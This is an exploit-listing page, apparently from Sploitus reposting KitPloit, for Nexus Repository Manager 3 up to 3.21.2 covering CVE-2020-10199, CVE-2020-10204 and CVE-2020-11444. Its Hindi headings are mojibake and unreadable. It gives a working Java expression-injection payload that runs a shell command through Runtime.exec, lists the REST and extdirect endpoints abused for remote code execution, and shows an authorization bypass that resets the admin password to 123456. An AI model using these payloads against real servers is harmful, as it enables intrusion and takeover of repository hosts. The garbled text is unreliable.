Sploitus

Exploit for CVE-2020-10199 CVE-2020-10199 CVE-2020-10204 CVE-2020-11444

kitploit ┬╖ 2026-08-25

Exploit Code

MARKDOWN62 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JAS502N-CVE-2020-10199
# Nexus Repository Manager 3 рднреЗрджреНрдпрддрд╛ (рдкреНрд░рднрд╛рд╡рд┐рдд рд╕рдВрд╕реНрдХрд░рдг: <= 3.21.2)

## CVE-2020-10199, CVE-2020-10204, CVE-2020-11444

## CVE-2020-10199 рджреВрд░рд╕реНрде рдХреЛрдб рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди

## рдЗрдХреЛ poc

![](https://assets.kitploit.com/production/public/readmes/27355/786b5fceb2d6420b4724786a60ea03c106a3fbb198ed27dbc6a5bc6e239a346c.gif)

## рдЧреИрд░-рдЗрдХреЛ poc

`$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/cve-2020-10199')}`

## рд╕рд╛рдорд╛рдиреНрдп рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрдиреБрдорддрд┐

root@kitploit:~
    
    
    /service/rest/beta/repositories/go/group
    

## рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдЕрдиреБрдорддрд┐ рдЖрд╡рд╢реНрдпрдХ

  1. CleanupPolicy рдмрдирд╛рдПрдБ



`/service/extdirect`

  2. repositories рдмрдирд╛рдПрдБ



`/service/rest/beta/repositories/apt/hosted`

# CVE-2020-10204 рджреВрд░рд╕реНрде рдХреЛрдб рдХрдорд╛рдВрдб рдирд┐рд╖реНрдкрд╛рджрди

  1. рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЕрджреНрдпрддрди рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рдХрд╛ рд╢реЛрд╖рдг рдХрд░реЗрдВ `/service/extdirect`
  2. рднреВрдорд┐рдХрд╛ рдирд┐рд░реНрдорд╛рдг рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рдХрд╛ рд╢реЛрд╖рдг рдХрд░реЗрдВ `/service/extdirect`



# CVE-2020-11444 рдкреНрд░рд╛рдзрд┐рдХрд░рдг рдмрд╛рдЗрдкрд╛рд╕ рднреЗрджреНрдпрддрд╛

## рднреВрдорд┐рдХрд╛ рдЕрджреНрдпрддрди рдЗрдВрдЯрд░рдлрд╝реЗрд╕ рдХреЛ рдХреЙрд▓ рдХрд░реЗрдВ

root@kitploit:~
    
    
    /service/rest/beta/security/users/admin/change-password
    
    POST:
    123456
    

# рд╕рдВрджрд░реНрдн рд▓рд┐рдВрдХ

https://www.cnblogs.com/magic-zero/p/12641068.html

https://github.com/threedr3am/learnjavabug/tree/93d57c428333f98b5927d02630737e639dcb226b/nexus